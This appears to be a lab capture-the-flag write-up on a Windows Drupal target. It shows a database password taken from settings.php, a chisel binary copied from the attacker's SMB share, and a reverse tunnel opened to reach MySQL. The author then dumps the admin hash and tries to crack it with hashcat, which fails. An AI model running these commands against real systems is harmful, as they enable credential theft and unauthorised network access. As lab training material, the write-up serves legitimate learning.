InfoSec LAB

Bastard_DB

Created: 3 min read

DB

DB Credential

PS C:\inetpub\drupal-7.54\sites\default> dir
 
 
    Directory: C:\inetpub\drupal-7.54\sites\default
 
 
Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d----         19/3/2017   1:52 ??            files                             
-a---         19/3/2017  12:42 ??      26250 default.settings.php              
-a---        31/10/2022   4:17 ??      26528 settings.php                      
-ar--         19/3/2017  12:47 ??      26556 settings.php.bak

By default, Windows installation of Drupal 7 stores the configuration file at sites\default I can see the settings.php file

PS C:\inetpub\drupal-7.54\sites\default> cat settings.php
<?php
 
[...REDACTED...]
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'root',
      'password' => 'mysql123!root',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
 
[...REDACTED...]
 
?>?

Found the DB credential; root:mysql123!root

MySQL client

PS C:\inetpub\drupal-7.54\sites\default> mysql --version
C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe  Ver 14.14 Distrib 5.5.45, for Win64 (x86)

MySQL client is installed on the target system C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe

I was really hoping for it as I saw the port 3306 being open

PS C:\Program Files> mysql -uroot -p

But it is really buggy and not stable.

I would have to tunnel the port 3306 since I can’t directly reach it

Tunneling

ps c:\tmp> copy \\10.10.14.6\smb\chiselx64.exe
ps c:\tmp> .\chiselx64.exe client 10.10.14.6:55555 R:33060:3306

I transferred chisel and connect to the server on Kali to tunnel target port 3306 to Kali’s 33060

Connection received I can now reach the target port 3306 through the Kali’s port33060

MySQL server

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ mysql -P 33060 -uroot -p
Enter password: mysql123!root
WARNING: Forcing protocol to  TCP  due to option specification. Please explicitly state intended protocol.
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 5.5.45 MySQL Community Server (GPL)
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MySQL [(none)]>

I successfully logged in to the target MySQL server

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal             |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.031 sec)

There are 2 none default DBs drupal test

MySQL [(none)]> use test;
Database changed
MySQL [test]> show tables;
Empty set (0.031 sec)

The test DB is empty

MySQL [test]> use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
MySQL [drupal]> select name,pass from users;
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
|       |                                                         |
| admin | $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE |
+-------+---------------------------------------------------------+
2 rows in set (0.031 sec)

I got a credential hash But this must be the web user

PS C:\hashcat-6.2.6> .\hashcat.exe -a 0 -m 7900 .\hashes .\rockyou.txt -d 2 -O --self-test-dishashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE
Time.Started.....: Sat Jan 14 10:49:02 2023 (9 mins, 36 secs)
Time.Estimated...: Sat Jan 14 10:58:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:    24901 H/s (1.02ms) @ Accel:16 Loops:256 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:32512-32768
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[203020302030] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#2..: Temp: 65c Util: 73% Core:1792MHz Mem:6000MHz Bus:8
 
Started: Sat Jan 14 10:48:44 2023
Stopped: Sat Jan 14 10:58:40 2023

Hashcat could not crack the password hash Deadend.

Interactive Graph View

Backlinks